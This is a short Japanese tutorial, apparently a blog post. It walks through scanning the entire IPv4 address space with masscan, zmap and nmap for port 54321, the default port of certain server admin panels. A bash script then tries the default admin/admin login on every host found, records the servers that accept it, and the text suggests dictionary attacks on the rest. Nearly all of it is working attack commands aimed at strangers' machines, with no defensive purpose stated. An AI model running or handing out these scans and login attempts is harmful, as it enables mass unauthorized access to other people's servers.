準備#
- Debian または Ubuntu サーバー
ツールのインストール#
apt install -y nmap zmap masscan
グローバルスキャン#
masscan
masscan 0.0.0.0/0 -p54321 --banners --exclude 255.255.255.255 -oJ scan.json
zmap
zmap --target-port=54321 --output-file=scan.log
nmap
nmap -sS 0.0.0.0/0 -p 54321 | grep -v failed > scan.log
弱いパスワードのログイン#
以前、いくつかの UI のワンクリックインストールスクリプトでは、admin/admin の弱いパスワードが使用されていました。多くの人々が変更するのを怠っているため、デフォルトのポート 54321 を開いているサーバーに対してログインを試みることができます。
#!/bin/bash
for ip_ad in $(sed -nE 's/.*"ip": "([^"]+)".*/\1/p' scan.json); do
if curl --max-time 1 http://$ip_ad:54321; then
res=$(curl "http://${ip_ad}:54321/login" --data-raw 'username=admin&password=admin' --compressed --insecure)
if [[ "$res" =~ .*true.* ]]; then
echo $ip_ad | tee >> week.log
fi
echo $ip_ad | tee >> all.log
fi
done;
week.log には、弱いパスワードでログインできるすべてのマシンが含まれています。それはかなり簡単にスキャンできます。
all.log はパスワードが変更されたマシンです。興味があれば、さらに辞書列挙を試してみることができます。